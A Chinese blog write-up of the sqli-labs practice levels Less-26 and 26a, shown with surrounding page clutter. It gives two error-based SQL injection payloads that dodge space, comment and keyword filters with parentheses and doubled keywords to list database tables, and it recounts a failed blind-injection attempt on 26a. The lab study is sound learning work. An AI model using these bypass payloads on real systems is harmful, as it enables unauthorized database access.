sqlilabs less-26~26a

已于 2022-07-19 16:02:12 修改
阅读量459 收藏 2
点赞数
分类专栏: sqli-labs 文章标签: 数据库 mysql
于 2022-07-18 17:02:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/125850568
版权

sqlilabs less-26

less-26

前期判断

在这里插入图片描述
空格和注释都用不了,并且判断出来是单引号,根据前面的经验,用两个单引号闭合。

最开始想通过替换空格来注入%00、%09、%0a、%0d`。经过burpsuite和手动测试下来都不行。在这里插入图片描述
在这里插入图片描述
还有一种方法,用圆括号"()"代替空格。

报错注入

可以通过 || 和 && 绕过 or 和 and ,但是我这又不行。
在这里插入图片描述
1'&&(extractvalue(1,concat(0x7c,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())))))))&&'1在这里插入图片描述

1'anandd(extractvalue(1,concat(0x7c,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())))))anandd'1

在这里插入图片描述
获取字段名会遇到长度不够的问题,用mid()慢慢来。
在这里插入图片描述

源码时间

在这里插入图片描述
可以看到相比上次过滤了更多。

less-26a

问题总结

在这里插入图片描述

这次报错浏览器没有返回了,考虑使用时间报错注入。但是这次的注入有点离谱,因为没有注释没有空格,而且能替代空格的都用不了,再加上又是盲注,尝试过多次报错注入,使用updatexml、extractvalue配合if、substr、mid、sleep又会出现 Only constant XPATH queries are supported

永远是深夜有多好。
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Only constant XPATH queries are supported
weixin_43403663的博客
11-21 718
Only constant XPATH queries are supported
春秋云境:CVE-2022-24124(Casdoor api get-oraganizations SQL注入)
m0_65712192的博客
07-23 1011
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
SQLi LABS Less 26a 联合注入+布尔盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第26a关,SQLi-LABS Less-26aSQLi-LABS Less 26aSQLiLABS Less26aSQLi Less 26a
生命在于折腾——SQL注入的实操(六)less26-30
易水哲的博客
08-21 502
sql-lib项目,本篇文章介绍关卡26-30。
Sqli-labs之Less-26和Less-26a
m0_46315342的博客
06-04 2006
                                          &nbs...
ciscn2021-easy-sql无列名注入
soldi_er的博客
05-17 567
文章目录   登陆框。前端代码无信息。   部分黑名单字符:Union、Information、Sys、nno、column。   学到的东西: (1)Union的绕过,虽然比赛中绕不过去,但可以拓展绕过知识。 (2)查表的一些视图。 (3)无列名注入,通过表名可以查列名,无需union关键字。   前期报错注入,可以查到数据库名。 测试1:uname=1&passwd='。发现是MariaDB。 You have an error in your SQL syntax; check the ma
自然流产胚胎绒毛组织hsa-miR-26a表达研究 (2010年)
05-12
以正常绒毛为对照,通过qRT-PCR检测自然流产胚胎绒毛组织中hsa-miR-26a的表达水平;利用基因表达谱 芯片筛选自然流产胚胎绒毛的差异表达基因,并使用 Targetscan预测这些差异表达基因中可能为 hsa-miR-26a所调 控的靶...
311153050-18191-26A_离散数学(何坤)1
08-03
离散数学是计算机科学中的基础学科,主要研究离散而非连续的数学结构。这份试卷是针对四川大学软件工程2017级学生的期末考试,由何坤等多位教师出题,涉及命题逻辑、关系理论、图论、集合论等多个离散数学的核心知识...
SG-26A-气动PLC控制实验装置(带机械手).docx
12-17
SG-26A气动PLC控制实验装置(带机械手)是一款专门设计用于高等教育中机电一体化、机械工程和自动化专业教学的实验设备。它结合了气动原理与可编程控制器(PLC)技术,旨在帮助学生深入理解和掌握气动元件的结构、...
全功能11-26A.zip
01-31
2. **版本信息**:“11-26A”可能是日期(11月26日)和/或版本号,这有助于追踪软件的更新历史。 3. **操作系统兼容性**:由于包含.exe文件,这个软件设计用于Windows操作系统。可能不适用于MacOS或Linux等其他平台...
单板11-26A.zip
最新发布
01-31
很抱歉,根据您提供的信息,"单板11-26A.zip" 是一个压缩文件,但没有具体的描述或标签来指示它包含的IT知识点。压缩包内的唯一文件是 "单板11-26A.exe",这通常是一个可执行文件,可能是某种软件应用程序或者系统...
渗透测试项目一
giantbranch的专栏
11-25 6967
实验来源:合天网安实验室:http://www.hetianlab.com/ 实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络技术、网络安全与防护实验时数(学分):4学时实验类别:实践实验类 实验场景 某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心
escape.alf.nu XSS Challenges 8-15 之进阶的XSS
giantbranch的专栏
05-29 7304
本文链接:http://blog.csdn.net/u012763794/article/details/51526725 上次讲了challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593,我的应该比别人的会详细一点吧,其实这需要有一定的xss的实践(自己搭环境搞个没过滤的就可以了),要熟悉js 废话不
escape.alf.nu XSS Challenges 0-7 之一步步学XSS
giantbranch的专栏
05-28 9810
本文链接:http://blog.csdn.net/u012763794/article/details/51507593 以下挑战来源于:http://escape.alf.nu/ 你可能需要html,css,javascript的知识,没有的赶紧学吧 challenge 0 function escape(s) { // Warmup. return
mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql
weixin_35917998的博客
01-19 525
日期:2019-07-23 19:55:59更新:2019-08-02 10:40:37作者:Bay0net介绍:Mysql 注入笔记0x01、 基本信息1.1 基本术语数据库: 数据库是一些关联表的集合。数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。行:一行(=元组,或记录)是一组相关的数据,例如一条用...
如何求原根
热门推荐
giantbranch的专栏
01-11 2万+
说这种最好就是举个例子 比如说求81的所有原根   先说欧拉函数通式: 通式:φ(x)=x(1-1/p1)(1-1/p2)(1-1/p3)(1-1/p4)…..(1-1/pn),其中p1, p2……pn为x的所有质因数,x是不为0的整数。φ(1)=1(唯一和1互质的数(小于等于1)就是1本身)。 (注意:每种质因数只一个。比如12=2*2*3那么φ(12)=12*(1-1/2)*(1-1/...
pwndbg ImportError: ERROR: fail to load the dynamic library. 问题解决
giantbranch的专栏
08-30 3538
很明显这是没有找到库 Traceback (most recent call last): File "/home/giant/pwndbg/gdbinit.py", line 36, in <module> import pwndbg # isort:skip File "/home/giant/pwndbg/pwndbg/__init__.py", line 13...
pugixml 一个xml解析库 简单快速, 支持XPath表达式, 感谢作者
jdzfjfhnui的专栏
08-09 1万+
只是简单的翻译了pugixml文档,暂时未翻译XPath部分. /* 1.对象模型 pugixaml存储XML数据为DOM风格,整个xml文档(文档结构和元素数据)被存储在内存中作为一棵树.这棵树可以从字符流(文件,字符串,C++ I/O流)中加载,可以使用 特定的A
TypeError Traceback (most recent call last) <ipython-input-1-26a0454c3f6e> in <module>() ----> 1 import mglearn ~\Anaconda3\lib\site-packages\mglearn\__init__.py in <module>() ----> 1 from . import plots 2 from . import tools 3 from .plots import cm3, cm2 4 from .tools import discrete_scatter 5 from .plot_helpers import ReBl ~\Anaconda3\lib\site-packages\mglearn\plots.py in <module>() 12 from .plot_tree_nonmonotonous import plot_tree_not_monotone 13 from .plot_scaling import plot_scaling ---> 14 from .plot_pca import plot_pca_illustration, plot_pca_whitening, plot_pca_faces 15 from .plot_decomposition import plot_decomposition 16 from .plot_nmf import plot_nmf_illustration, plot_nmf_faces ~\Anaconda3\lib\site-packages\mglearn\plot_pca.py in <module>() 5 from joblib import Memory 6 ----> 7 memory = Memory(cachedir="cache") 8 9 TypeError: __init__() got an unexpected keyword argument 'cachedir'
05-05
这个错误可能是因为你正在使用较旧的版本的 joblib 库,而 cachedir 参数是在较新版本中引入的。尝试更新 joblib 库以解决问题。你可以在命令行中使用以下命令更新 joblib 库: ``` pip install -U joblib ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值